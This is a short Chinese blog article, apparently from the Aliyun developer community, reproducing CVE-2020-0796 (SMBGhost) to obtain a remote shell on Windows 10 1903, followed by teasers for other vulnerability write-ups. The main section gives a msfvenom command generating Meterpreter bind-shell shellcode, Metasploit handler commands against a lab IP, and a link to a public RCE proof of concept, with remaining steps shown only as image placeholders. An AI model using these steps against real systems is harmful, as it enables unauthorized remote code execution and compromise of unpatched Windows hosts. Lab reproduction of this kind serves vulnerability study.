开发者社区安全文章正文

漏洞复现--CVE-2020-0796getshell

2023-05-19 140

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： 漏洞复现--CVE-2020-0796getshell

漏洞描述：

该漏洞是由SMBv3处理恶意制作的压缩数据包，未经认证攻击者可能利用此漏洞执行任意代码。

测试环境及工具：

windows10 1903 64位下载：

http://xz1.yes025.com/iso/cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso

CVE-2020-0796 "poc"下载：

https://github.com/chompie1337/SMBGhost_RCE_PoC

生成正向连接木马：

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

1b4497da3a2bfdf22db87272542f33a7_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

msf监听：

use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 4444
set rhost 192.168.1.144
run

d3050d5a5230a94d2c74421aebd17d88_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

poc替换:

84225836304b213b5ca0b2088ab4f5c8_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

修改内存为4G以上：

78c46d344fe86991b6ec940dabb07496_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

成功getshell

ae39373b22032e8ab7cfcff3ee9f9a8e_640_wx_fmt=gif&wxfrom=5&wx_lazy=1.gif

文章标签：

测试技术

安全

雷石安全实验室

CTO技术共享

存储监控安全

Zabbix登录绕过漏洞复现（CVE-2022-23131）

最近在复现zabbix的漏洞（CVE-2022-23131），偶然间拿到了国外某公司zabbix服务器。Zabbix Sia Zabbix是拉脱维亚Zabbix SIA（Zabbix Sia）公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix Frontend 存在安全漏洞，该漏洞源于在启用 SAML SSO 身份验证（非默认）的情况下，恶意行为者可以修改会话数据，因为存储在会话中的用户登录未经过验证。未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。

CTO技术共享

1594 0 0

李火火

7月前

安全 Python Windows

RARLAB WinRAR 代码执行漏洞RCE (CVE-2023-38831)

WinRAR 是一款功能强大的压缩包管理器，它是档案工具RAR在 Windows环境下的图形界面。该软件可用于备份数据，缩减电子邮件附件的大小，解压缩从 Internet 上下载的RAR、ZIP及其它类型文件，并且可以新建 RAR 及 ZIP 格式等的压缩类文件。从5.60版开始，WinRAR启用了新的图标，但用户仍可以通过官网提供的主题包换回原版风格的图标。

李火火

80 2 2

Vista_AX

10月前

XML 安全 Oracle

Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271 漏洞复现

Vista_AX

107 0 0

Vista_AX

10月前

开发框架安全 PHP

Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞漏洞复现